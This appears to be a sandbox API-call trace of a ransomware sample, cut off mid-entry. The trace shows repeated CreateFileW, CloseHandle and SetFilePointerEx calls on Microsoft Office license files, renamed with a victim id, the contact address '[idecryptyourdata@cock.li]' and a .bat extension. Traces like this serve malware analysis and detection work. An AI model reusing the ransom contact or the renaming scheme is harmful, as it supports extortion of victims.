[0164.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.681] CloseHandle (hObject=0x50c) returned 1 [0164.681] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.681] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.682] CloseHandle (hObject=0x50c) returned 1 [0164.682] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.682] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.683] CloseHandle (hObject=0x50c) returned 1 [0164.684] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.684] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.684] CloseHandle (hObject=0x50c) returned 1 [0164.685] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.685] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.685] CloseHandle (hObject=0x50c) returned 1 [0164.686] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.686] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.686] CloseHandle (hObject=0x50c) returned 1 [0164.687] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.687] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.687] CloseHandle (hObject=0x50c) returned 1 [0164.688] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.688] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.688] CloseHandle (hObject=0x50c) returned 1 [0164.689] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.689] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.689] CloseHandle (hObject=0x50c) returned 1 [0164.690] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.690] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.690] CloseHandle (hObject=0x50c) returned 1 [0164.691] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.691] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.691] CloseHandle (hObject=0x50c) returned 1 [0164.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.692] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.693] CloseHandle (hObject=0x50c) returned 1 [0164.693] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.693] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.694] CloseHandle (hObject=0x50c) returned 1 [0165.771] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.771] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.364] CloseHandle (hObject=0x51c) returned 1 [0166.365] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.365] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.366] CloseHandle (hObject=0x51c) returned 1 [0166.366] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.366] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.367] CloseHandle (hObject=0x51c) returned 1 [0166.367] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.368] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.368] CloseHandle (hObject=0x51c) returned 1 [0166.368] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.369] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.369] CloseHandle (hObject=0x51c) returned 1 [0166.370] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.370] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.370] CloseHandle (hObject=0x51c) returned 1 [0166.371] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.371] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.371] CloseHandle (hObject=0x51c) returned 1 [0166.374] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.374] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.375] CloseHandle (hObject=0x51c) returned 1 [0166.376] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.376] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.376] CloseHandle (hObject=0x51c) returned 1 [0166.377] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.377] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.377] CloseHandle (hObject=0x51c) returned 1 [0166.378] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.378] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.379] CloseHandle (hObject=0x51c) returned 1 [0166.379] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.379] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.380] CloseHandle (hObject=0x51c) returned 1 [0166.380] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.380] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.381] CloseHandle (hObject=0x51c) returned 1 [0166.381] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.382] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.382] CloseHandle (hObject=0x51c) returned 1 [0166.383] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.383] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.383] CloseHandle (hObject=0x51c) returned 1 [0166.383] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.384] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.384] CloseHandle (hObject=0x51c) returned 1 [0166.385] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.385] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.385] CloseHandle (hObject=0x51c) returned 1 [0166.386] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.386] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.386] CloseHandle (hObject=0x51c) returned 1 [0166.387] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.387] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 